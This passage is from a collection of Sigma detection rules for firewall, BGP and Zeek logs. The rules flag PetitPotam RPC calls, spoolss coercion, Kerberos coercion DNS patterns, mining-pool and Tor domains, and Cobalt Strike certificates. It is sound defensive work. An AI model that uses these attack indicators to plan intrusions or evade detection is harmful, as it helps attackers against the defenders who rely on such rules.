usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that encryption is used for all sensitive information in transit. Ensure that encrypted channels are used for all administrative account access. references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf author: Alexandr Yampolskyi, SOC Prime, Tim Shelton date: 2019-03-26 modified: 2022-10-10 tags: - attack.credential-access # - CSC4 # - CSC4.5 # - CSC14 # - CSC14.4 # - CSC16 # - CSC16.5 # - NIST CSF 1.1 PR.AT-2 # - NIST CSF 1.1 PR.MA-2 # - NIST CSF 1.1 PR.PT-3 # - NIST CSF 1.1 PR.AC-1 # - NIST CSF 1.1 PR.AC-4 # - NIST CSF 1.1 PR.AC-5 # - NIST CSF 1.1 PR.AC-6 # - NIST CSF 1.1 PR.AC-7 # - NIST CSF 1.1 PR.DS-1 # - NIST CSF 1.1 PR.DS-2 # - ISO 27002-2013 A.9.2.1 # - ISO 27002-2013 A.9.2.2 # - ISO 27002-2013 A.9.2.3 # - ISO 27002-2013 A.9.2.4 # - ISO 27002-2013 A.9.2.5 # - ISO 27002-2013 A.9.2.6 # - ISO 27002-2013 A.9.3.1 # - ISO 27002-2013 A.9.4.1 # - ISO 27002-2013 A.9.4.2 # - ISO 27002-2013 A.9.4.3 # - ISO 27002-2013 A.9.4.4 # - ISO 27002-2013 A.8.3.1 # - ISO 27002-2013 A.9.1.1 # - ISO 27002-2013 A.10.1.1 # - PCI DSS 3.2 2.1 # - PCI DSS 3.2 8.1 # - PCI DSS 3.2 8.2 # - PCI DSS 3.2 8.3 # - PCI DSS 3.2 8.7 # - PCI DSS 3.2 8.8 # - PCI DSS 3.2 1.3 # - PCI DSS 3.2 1.4 # - PCI DSS 3.2 4.3 # - PCI DSS 3.2 7.1 # - PCI DSS 3.2 7.2 # - PCI DSS 3.2 7.3 logsource: category: firewall detection: selection: dst_port: - 8080 - 21 - 80 - 23 - 50000 - 1521 - 27017 - 3306 - 1433 - 11211 - 15672 - 5900 - 5901 - 5902 - 5903 - 5904 selection_allow1: action: - forward - accept - 2 selection_allow2: blocked: "false" # not all firewalls populate the action field; some only set a blocked flag indicating whether the connection was blocked or allowed condition: selection and 1 of selection_allow* falsepositives: - Unknown level: low ================================================ FILE: 
rules/network/fortinet/fortigate/fortinet_fortigate_new_admin_account_created.yml ================================================ title: FortiGate - New Administrator Account Created id: cd0a4943-0edd-42cf-b50c-06f77a10d4c1 status: experimental description: Detects the creation of an administrator account on a Fortinet FortiGate Firewall. references: - https://www.fortiguard.com/psirt/FG-IR-24-535 - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/390485493/config-system-admin - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr author: Marco Pedrinazzi @pedrinazziM (InTheCyber) date: 2025-11-01 tags: - attack.persistence - attack.t1136.001 logsource: product: fortigate service: event detection: selection: action: 'Add' cfgpath: 'system.admin' condition: selection falsepositives: - An administrator account can be created for legitimate purposes. Investigate the account details to determine if it is authorized. level: medium ================================================ FILE: rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_address_object.yml ================================================ title: FortiGate - Firewall Address Object Added id: 5c8d7b41-3812-432f-a0bb-4cfb7c31827e status: experimental description: Detects the addition of firewall address objects on a Fortinet FortiGate Firewall. 
references: - https://www.fortiguard.com/psirt/FG-IR-24-535 - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/306021697/config-firewall-address - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr author: Marco Pedrinazzi @pedrinazziM (InTheCyber) date: 2025-11-01 tags: - attack.defense-evasion - attack.t1562 logsource: product: fortigate service: event detection: selection: action: 'Add' cfgpath: 'firewall.address' condition: selection falsepositives: - An address could be added or deleted for legitimate purposes. level: medium ================================================ FILE: rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_policy_added.yml ================================================ title: FortiGate - New Firewall Policy Added id: f24ab7a8-f09a-4319-82c1-915586aa642b status: experimental description: Detects the addition of a new firewall policy on a Fortinet FortiGate Firewall. references: - https://www.fortiguard.com/psirt/FG-IR-24-535 - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/333889629/config-firewall-policy - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr author: Marco Pedrinazzi @pedrinazziM (InTheCyber) date: 2025-11-01 tags: - attack.defense-evasion - attack.t1562 logsource: product: fortigate service: event detection: selection: action: 'Add' cfgpath: 'firewall.policy' condition: selection falsepositives: - A firewall policy can be added for legitimate purposes. 
level: medium ================================================ FILE: rules/network/fortinet/fortigate/fortinet_fortigate_new_local_user_created.yml ================================================ title: FortiGate - New Local User Created id: ddbbe845-1d74-43a8-8231-2156d180234d status: experimental description: | Detects the creation of a new local user on a Fortinet FortiGate Firewall. The new local user could be used for VPN connections. references: - https://www.fortiguard.com/psirt/FG-IR-24-535 - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/109120963/config-user-local - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr author: Marco Pedrinazzi @pedrinazziM (InTheCyber) date: 2025-11-01 tags: - attack.persistence - attack.t1136.001 logsource: product: fortigate service: event detection: selection: action: 'Add' cfgpath: 'user.local' condition: selection falsepositives: - A local user can be created for legitimate purposes. Investigate the user details to determine if it is authorized. level: medium ================================================ FILE: rules/network/fortinet/fortigate/fortinet_fortigate_new_vpn_ssl_web_portal.yml ================================================ title: FortiGate - New VPN SSL Web Portal Added id: 2bfb6216-0c31-4d20-8501-2629b29a3fa2 status: experimental description: | Detects the addition of a VPN SSL Web Portal on a Fortinet FortiGate Firewall. This behavior was observed in pair with modification of VPN SSL settings. 
references: - https://www.fortiguard.com/psirt/FG-IR-24-535 - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/113121765/config-vpn-ssl-web-portal - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr author: Marco Pedrinazzi @pedrinazziM (InTheCyber) date: 2025-11-01 tags: - attack.persistence - attack.initial-access - attack.t1133 logsource: product: fortigate service: event detection: selection: action: 'Add' cfgpath: 'vpn.ssl.web.portal' condition: selection falsepositives: - A VPN SSL Web Portal can be added for legitimate purposes. level: medium ================================================ FILE: rules/network/fortinet/fortigate/fortinet_fortigate_user_group_modified.yml ================================================ title: FortiGate - User Group Modified id: 69ffc84e-8b1a-4024-8351-e018f66b8275 status: experimental description: | Detects the modification of a user group on a Fortinet FortiGate Firewall. The group could be used to grant VPN access to a network. references: - https://www.fortiguard.com/psirt/FG-IR-24-535 - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr author: Marco Pedrinazzi @pedrinazziM (InTheCyber) date: 2025-11-01 tags: - attack.persistence - attack.privilege-escalation # - attack.t1098.007 logsource: product: fortigate service: event detection: selection: action: 'Edit' cfgpath: 'user.group' condition: selection falsepositives: - A group can be modified for legitimate purposes. 
level: medium ================================================ FILE: rules/network/fortinet/fortigate/fortinet_fortigate_vpn_ssl_settings_modified.yml ================================================ title: FortiGate - VPN SSL Settings Modified id: 8b5dacf2-aeb7-459d-b133-678eb696d410 status: experimental description: | Detects the modification of VPN SSL Settings (for example, the modification of authentication rules). This behavior was observed together with the addition of a VPN SSL Web Portal. references: - https://www.fortiguard.com/psirt/FG-IR-24-535 - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/114404382/config-vpn-ssl-settings - https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44546/44546-logid-event-config-attr author: Marco Pedrinazzi @pedrinazziM (InTheCyber) date: 2025-11-01 tags: - attack.persistence - attack.initial-access - attack.t1133 logsource: product: fortigate service: event detection: selection: action: 'Edit' cfgpath: 'vpn.ssl.settings' condition: selection falsepositives: - VPN SSL settings can be changed for legitimate purposes. level: medium ================================================ FILE: rules/network/huawei/bgp/huawei_bgp_auth_failed.yml ================================================ title: Huawei BGP Authentication Failures id: a557ffe6-ac54-43d2-ae69-158027082350 status: test description: Detects BGP authentication failures, which may be indicative of brute force attacks to manipulate routing. 
references: - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf author: Tim Brown date: 2023-01-09 modified: 2023-01-23 tags: - attack.initial-access - attack.persistence - attack.privilege-escalation - attack.defense-evasion - attack.credential-access - attack.collection - attack.t1078 - attack.t1110 - attack.t1557 logsource: product: huawei service: bgp definition: 'Requirements: huawei bgp logs need to be enabled and ingested' detection: keywords_bgp_huawei: '|all': - ':179' # TCP port 179 (BGP) - 'BGP_AUTH_FAILED' condition: keywords_bgp_huawei falsepositives: - Unlikely, except in the case of misconfigurations level: low ================================================ FILE: rules/network/juniper/bgp/juniper_bgp_missing_md5.yml ================================================ title: Juniper BGP Missing MD5 id: a7c0ae48-8df8-42bf-91bd-2ea57e2f9d43 status: test description: Detects Juniper BGP sessions with a missing MD5 digest, which may be indicative of brute force attacks to manipulate routing. references: - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf author: Tim Brown date: 2023-01-09 modified: 2023-01-23 tags: - attack.initial-access - attack.persistence - attack.privilege-escalation - attack.defense-evasion - attack.credential-access - attack.collection - attack.t1078 - attack.t1110 - attack.t1557 logsource: product: juniper service: bgp definition: 'Requirements: juniper bgp logs need to be enabled and ingested' detection: keywords_bgp_juniper: '|all': - ':179' # TCP port 179 (BGP) - 'missing MD5 digest' condition: keywords_bgp_juniper falsepositives: - Unlikely. 
Except due to misconfigurations level: low ================================================ FILE: rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml ================================================ title: MITRE BZAR Indicators for Execution id: b640c0b8-87f8-4daa-aef8-95a24261dd1d status: test description: 'Windows DCE-RPC functions which indicate execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE' references: - https://github.com/mitre-attack/bzar#indicators-for-attck-execution author: '@neu5ron, SOC Prime' date: 2020-03-19 modified: 2021-11-27 tags: - attack.privilege-escalation - attack.persistence - attack.execution - attack.t1047 - attack.t1053.002 - attack.t1569.002 logsource: product: zeek service: dce_rpc detection: op1: endpoint: 'JobAdd' operation: 'atsvc' # NOTE(review): endpoint/operation appear swapped compared with op2-op10, where endpoint holds the interface and operation the method - verify against the referenced BZAR mapping op2: endpoint: 'ITaskSchedulerService' operation: 'SchRpcEnableTask' op3: endpoint: 'ITaskSchedulerService' operation: 'SchRpcRegisterTask' op4: endpoint: 'ITaskSchedulerService' operation: 'SchRpcRun' op5: endpoint: 'IWbemServices' operation: 'ExecMethod' op6: endpoint: 'IWbemServices' operation: 'ExecMethodAsync' op7: endpoint: 'svcctl' operation: 'CreateServiceA' op8: endpoint: 'svcctl' operation: 'CreateServiceW' op9: endpoint: 'svcctl' operation: 'StartServiceA' op10: endpoint: 'svcctl' operation: 'StartServiceW' condition: 1 of op* falsepositives: - Windows administrator tasks or troubleshooting - Windows management scripts or software level: medium ================================================ FILE: rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml ================================================ title: MITRE BZAR Indicators for Persistence id: 53389db6-ba46-48e3-a94c-e0f2cefe1583 status: test description: 'Windows DCE-RPC functions which indicate persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.' 
references: - https://github.com/mitre-attack/bzar#indicators-for-attck-persistence author: '@neu5ron, SOC Prime' date: 2020-03-19 modified: 2021-11-27 tags: - attack.privilege-escalation - attack.persistence - attack.t1547.004 logsource: product: zeek service: dce_rpc detection: op1: endpoint: 'spoolss' operation: 'RpcAddMonitor' op2: endpoint: 'spoolss' operation: 'RpcAddPrintProcessor' op3: endpoint: 'IRemoteWinspool' operation: 'RpcAsyncAddMonitor' op4: endpoint: 'IRemoteWinspool' operation: 'RpcAsyncAddPrintProcessor' op5: endpoint: 'ISecLogon' operation: 'SeclCreateProcessWithLogonW' op6: endpoint: 'ISecLogon' operation: 'SeclCreateProcessWithLogonExW' condition: 1 of op* falsepositives: - Windows administrator tasks or troubleshooting - Windows management scripts or software level: medium ================================================ FILE: rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml ================================================ title: Potential PetitPotam Attack Via EFS RPC Calls id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a status: test description: | Detects usage of the Windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack referred to as PetitPotam. Usage of this RPC function should be rare, if it is used at all, so any usage should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP. Logs from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc. 
references: - https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp - https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 - https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf - https://threatpost.com/microsoft-petitpotam-poc/168163/ author: '@neu5ron, @Antonlovesdnb, Mike Remen' date: 2021-08-17 modified: 2022-11-28 tags: - attack.collection - attack.credential-access - attack.t1557.001 - attack.t1187 logsource: product: zeek service: dce_rpc detection: selection: operation|startswith: 'efs' condition: selection falsepositives: - Uncommon but legitimate Windows administrator or software tasks that make use of the Encrypting File System RPC calls. Verify if this is common activity (see description). level: medium ================================================ FILE: rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml ================================================ title: SMB Spoolss Named Pipe Usage id: bae2865c-5565-470d-b505-9496c87d0c30 status: test description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger NTLM authentication from any machine that has the Print Spooler service enabled. 
references: - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 - https://dirkjanm.io/a-different-way-of-abusing-zerologon/ - https://twitter.com/_dirkjan/status/1309214379003588608 author: OTR (Open Threat Research), @neu5ron date: 2018-11-28 modified: 2022-10-09 tags: - attack.lateral-movement - attack.t1021.002 logsource: product: zeek service: smb_files detection: selection: path|endswith: 'IPC$' name: spoolss condition: selection falsepositives: - Domain Controllers that also act as print servers (a common configuration, although they should not be) level: medium ================================================ FILE: rules/network/zeek/zeek_default_cobalt_strike_certificate.yml ================================================ title: Default Cobalt Strike Certificate id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118 status: test description: Detects the presence of the default Cobalt Strike certificate in HTTPS traffic references: - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468 author: Bhabesh Raj date: 2021-06-23 modified: 2022-10-09 tags: - attack.command-and-control - attack.s0154 logsource: product: zeek service: x509 detection: selection: certificate.serial: 8BB00EE condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/network/zeek/zeek_dns_kerberos_coercion_via_dns_object_spn_spoofing.yml ================================================ title: Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing - Network id: 5588576c-5898-4fac-bcdd-7475a60e8f43 related: - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2 # Potential Kerberos Coercion via DNS Object Spoofing type: similar - id: e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing type: similar status: experimental 
description: | Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing. The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure. Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts. It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073. references: - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025 - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html author: Swachchhanda Shrawan Poudel (Nextron Systems) date: 2025-06-20 tags: - attack.collection - attack.credential-access - attack.persistence - attack.privilege-escalation - attack.t1557.001 - attack.t1187 logsource: product: zeek service: dns detection: selection: query|contains|all: - 'UWhRCA' # Follows this pattern UWhRCAAAAA..BAAA - 'BAAAA' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/network/zeek/zeek_dns_mining_pools.yml ================================================ title: DNS Events Related To Mining Pools id: bf74135c-18e8-4a72-a926-0e4f47888c19 status: test description: Identifies clients that may be performing DNS lookups associated with common currency mining pools. 
references: - https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml author: Saw Winn Naung, Azure-Sentinel, @neu5ron date: 2021-08-19 modified: 2022-07-07 tags: - attack.execution - attack.t1569.002 - attack.impact - attack.t1496 logsource: service: dns product: zeek detection: selection: query|endswith: - 'monerohash.com' - 'do-dear.com' - 'xmrminerpro.com' - 'secumine.net' - 'xmrpool.com' - 'minexmr.org' - 'hashanywhere.com' - 'xmrget.com' - 'mininglottery.eu' - 'minergate.com' - 'moriaxmr.com' - 'multipooler.com' - 'moneropools.com' - 'xmrpool.eu' - 'coolmining.club' - 'supportxmr.com' - 'minexmr.com' - 'hashvault.pro' - 'xmrpool.net' - 'crypto-pool.fr' - 'xmr.pt' - 'miner.rocks' - 'walpool.com' - 'herominers.com' - 'gntl.co.uk' - 'semipool.com' - 'coinfoundry.org' - 'cryptoknight.cc' - 'fairhash.org' - 'baikalmine.com' - 'tubepool.xyz' - 'fairpool.xyz' - 'asiapool.io' - 'coinpoolit.webhop.me' - 'nanopool.org' - 'moneropool.com' - 'miner.center' - 'prohash.net' - 'poolto.be' - 'cryptoescrow.eu' - 'monerominers.net' - 'cryptonotepool.org' - 'extrmepool.org' - 'webcoin.me' - 'kippo.eu' - 'hashinvest.ws' - 'monero.farm' - 'linux-repository-updates.com' - '1gh.com' - 'dwarfpool.com' - 'hash-to-coins.com' - 'pool-proxy.com' - 'hashfor.cash' - 'fairpool.cloud' - 'litecoinpool.org' - 'mineshaft.ml' - 'abcxyz.stream' - 'moneropool.ru' - 'cryptonotepool.org.uk' - 'extremepool.org' - 'extremehash.com' - 'hashinvest.net' - 'unipool.pro' - 'crypto-pools.org' - 'monero.net' - 'backup-pool.com' - 'mooo.com' # Dynamic DNS, may want to exclude - 'freeyy.me' - 'cryptonight.net' - 'shscrypto.net' exclude_answers: answers: - '127.0.0.1' - '0.0.0.0' exclude_rejected: rejected: 'true' condition: selection and not 1 of exclude_* falsepositives: - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections 
(conn.log) to those IPs. b) verify whether there was HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'. level: low ================================================ FILE: rules/network/zeek/zeek_dns_nkn.yml ================================================ title: New Kind of Network (NKN) Detection id: fa7703d6-0ee8-4949-889c-48c84bc15b6f status: test description: NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma> references: - https://github.com/nknorg/nkn-sdk-go - https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ - https://github.com/Maka8ka/NGLite author: Michael Portera (@mportatoes) date: 2022-04-21 tags: - attack.command-and-control logsource: product: zeek service: dns detection: selection: query|contains|all: - 'seed' - '.nkn.org' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/network/zeek/zeek_dns_susp_zbit_flag.yml ================================================ title: Suspicious DNS Z Flag Bit Set id: ede05abc-2c9e-4624-9944-9ff17fdc0bf5 status: test description: | The DNS Z flag is a bit within the DNS protocol header that is, per the IETF design, reserved (unused). Although it has recently been used in DNSSEC, the value being set to anything other than 0 should be rare. If it is set to a non-zero value and DNSSEC is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. 
This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs references: - https://twitter.com/neu5ron/status/1346245602502443009 - https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma - https://tools.ietf.org/html/rfc2929#section-2.1 - https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS author: '@neu5ron, SOC Prime Team, Corelight' date: 2021-05-04 modified: 2022-11-29 tags: - attack.t1095 - attack.t1571 - attack.command-and-control logsource: product: zeek service: dns detection: z_flag_unset: Z: 0 most_probable_valid_domain: query|contains: '.' exclude_tlds: query|endswith: - '.arpa' - '.local' - '.ultradns.net' - '.twtrdns.net' - '.azuredns-prd.info' - '.azure-dns.com' - '.azuredns-ff.info' - '.azuredns-ff.org' - '.azuregov-dns.org' exclude_query_types: qtype_name: - 'ns' - 'mx' exclude_responses: answers|endswith: '\\x00' exclude_netbios: id.resp_p: - 137 - 138 - 139 condition: not z_flag_unset and most_probable_valid_domain and not (exclude_tlds or exclude_query_types or exclude_responses or exclude_netbios) falsepositives: - 'Internal or legitimate external domains using DNSSEC. Verify if these are legitimate DNSSEC domains and then exclude them.' - 'If you work in the public sector, it may be good to exclude TLDs such as ".edu", ".gov" and/or ".mil"' level: medium ================================================ FILE: rules/network/zeek/zeek_dns_torproxy.yml ================================================ title: DNS TOR Proxies id: a8322756-015c-42e7-afb1-436e85ed3ff5 related: - id: b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544 type: similar - id: 8384bd26-bde6-4da9-8e5d-4174a7a47ca2 type: similar status: test description: Identifies IPs performing DNS lookups associated with common Tor proxies. 
references: - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml author: Saw Winn Naung , Azure-Sentinel date: 2021-08-15 modified: 2025-09-12 tags: - attack.exfiltration - attack.t1048 logsource: service: dns product: zeek detection: selection: query|endswith: - '.hiddenservice.net' - '.onion.ca' - '.onion.cab' - '.onion.casa' - '.onion.city' - '.onion.direct' - '.onion.dog' - '.onion.glass' - '.onion.gq' - '.onion.guide' - '.onion.in.net' - '.onion.ink' - '.onion.it' - '.onion.link' - '.onion.lt' - '.onion.lu' - '.onion.ly' - '.onion.mn' - '.onion.network' - '.onion.nu' - '.onion.pet' - '.onion.plus' - '.onion.pt' - '.onion.pw' - '.onion.rip' - '.onion.sh' - '.onion.si' - '.onion.to' - '.onion.top' - '.onion.ws' - '.onion' - '.s1.tor-gateways.de' - '.s2.tor-gateways.de' - '.s3.tor-gateways.de' - '.s4.tor-gateways.de' - '.s5.tor-gateways.de' - '.t2w.pw' - '.tor2web.ae.org' - '.tor2web.blutmagie.de' - '.tor2web.com' - '.tor2web.fi' - '.tor2web.io' - '.tor2web.org' - '.tor2web.xyz' - '.torlink.co' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/network/zeek/zeek_http_executable_download_from_webdav.yml ================================================ title: Executable from Webdav id: aac2fd97-bcba-491b-ad66-a6edf89c71bf status: test description: 'Detects executable access via webdav6. 
Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/' references: - http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html - https://github.com/OTRF/detection-hackathon-apt29 author: 'SOC Prime, Adam Swan' date: 2020-05-01 modified: 2021-11-27 tags: - attack.command-and-control - attack.t1105 logsource: product: zeek service: http detection: selection_webdav: - c-useragent|contains: 'WebDAV' - c-uri|contains: 'webdav' selection_executable: - resp_mime_types|contains: 'dosexec' - c-uri|endswith: '.exe' condition: selection_webdav and selection_executable falsepositives: - Unknown level: medium ================================================ FILE: rules/network/zeek/zeek_http_susp_file_ext_from_susp_tld.yml ================================================ title: HTTP Request to Low Reputation TLD or Suspicious File Extension id: 68c2c604-92ad-468b-bf4a-aac49adad08c status: experimental description: | Detects HTTP requests to low reputation TLDs (e.g. .xyz, .top, .ru) or ending in suspicious file extensions (.exe, .dll, .hta), which may indicate malicious activity. references: - https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows - https://www.spamhaus.org/reputation-statistics/cctlds/domains/ author: '@signalblur, Corelight' date: 2025-02-26 tags: - attack.initial-access - attack.command-and-control logsource: product: zeek service: http detection: # Suspicious TLD in the 'host' field OR malicious file extension in the 'uri' field. 
selection_suspicious_tld: host|endswith: - '.bid' - '.by' - '.cf' - '.click' - '.cm' - '.ga' - '.gq' - '.ir' - '.kp' - '.loan' - '.ml' - '.mm' - '.party' - '.pw' - '.ru' - '.su' - '.sy' - '.tk' - '.top' - '.tv' - '.ve' - '.work' - '.xyz' selection_malicious_ext: uri|endswith: - '.bat' - '.bin' - '.cmd' - '.cpl' - '.dll' - '.dylib' - '.elf' - '.exe' - '.hta' - '.iso' - '.jar' - '.js' - '.lnk' - '.msi' - '.pif' - '.ps1' - '.py' - '.reg' - '.scr' - '.sh' - '.so' - '.vbs' - '.wsf' selection_malicious_mime: resp_mime_types: - 'application/vnd.microsoft.portable-executable' - 'application/x-bat' - 'application/x-dosexec' - 'application/x-elf' - 'application/x-iso9660-image' - 'application/x-java-archive' - 'application/x-ms-shortcut' - 'application/x-msdos-program' - 'application/x-msdownload' - 'application/x-python-code' - 'application/x-sh' condition: selection_suspicious_tld and 1 of selection_malicious_* falsepositives: - Rare legitimate software downloads from low quality TLDs level: medium ================================================ FILE: rules/network/zeek/zeek_http_webdav_put_request.yml ================================================ title: WebDav Put Request id: 705072a5-bb6f-4ced-95b6-ecfa6602090b status: test description: A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration. 
references: - https://github.com/OTRF/detection-hackathon-apt29/issues/17 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) date: 2020-05-02 modified: 2024-03-13 tags: - attack.exfiltration - attack.t1048.003 logsource: product: zeek service: http detection: selection: user_agent|contains: 'WebDAV' method: 'PUT' filter: id.resp_h|cidr: - '10.0.0.0/8' - '127.0.0.0/8' - '172.16.0.0/12' - '192.168.0.0/16' - '169.254.0.0/16' condition: selection and not filter falsepositives: - Unknown level: low ================================================ FILE: rules/network/zeek/zeek_rdp_public_listener.yml ================================================ title: Publicly Accessible RDP Service id: 1fc0809e-06bf-4de3-ad52-25e5263b7623 status: test description: | Detects connections from routable IPs to an RDP listener. Which is indicative of a publicly-accessible RDP service. author: Josh Brower @DefensiveDepth date: 2020-08-22 modified: 2024-03-13 tags: - attack.lateral-movement - attack.t1021.001 logsource: product: zeek service: rdp detection: selection: id.orig_h|cidr: - '::1/128' # IPv6 loopback - '10.0.0.0/8' - '127.0.0.0/8' - '172.16.0.0/12' - '192.168.0.0/16' - '169.254.0.0/16' - '2620:83:8000::/48' - 'fc00::/7' # IPv6 private addresses - 'fe80::/10' # IPv6 link-local addresses # approved_rdp: # dst_ip: # - x.x.x.x condition: not selection # and not approved_rdp falsepositives: - Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet. 
level: high ================================================ FILE: rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml ================================================ title: Remote Task Creation via ATSVC Named Pipe - Zeek id: dde85b37-40cd-4a94-b00c-0b8794f956b5 related: - id: f6de6525-4509-495a-8a82-1f8b0ed73a00 type: derived status: test description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe references: - https://web.archive.org/web/20230409194125/https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html author: 'Samir Bousseaden, @neu5rn' date: 2020-04-03 modified: 2022-12-27 tags: - attack.privilege-escalation - attack.execution - attack.lateral-movement - attack.persistence - car.2013-05-004 - car.2015-04-001 - attack.t1053.002 logsource: product: zeek service: smb_files detection: selection: path: '\\\*\IPC$' name: 'atsvc' # Accesses: '*WriteData*' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml ================================================ title: Possible Impacket SecretDump Remote Activity - Zeek id: 92dae1ed-1c9d-4eff-a567-33acbd95b00e status: test description: 'Detect AD credential dumping using impacket secretdump HKTL. 
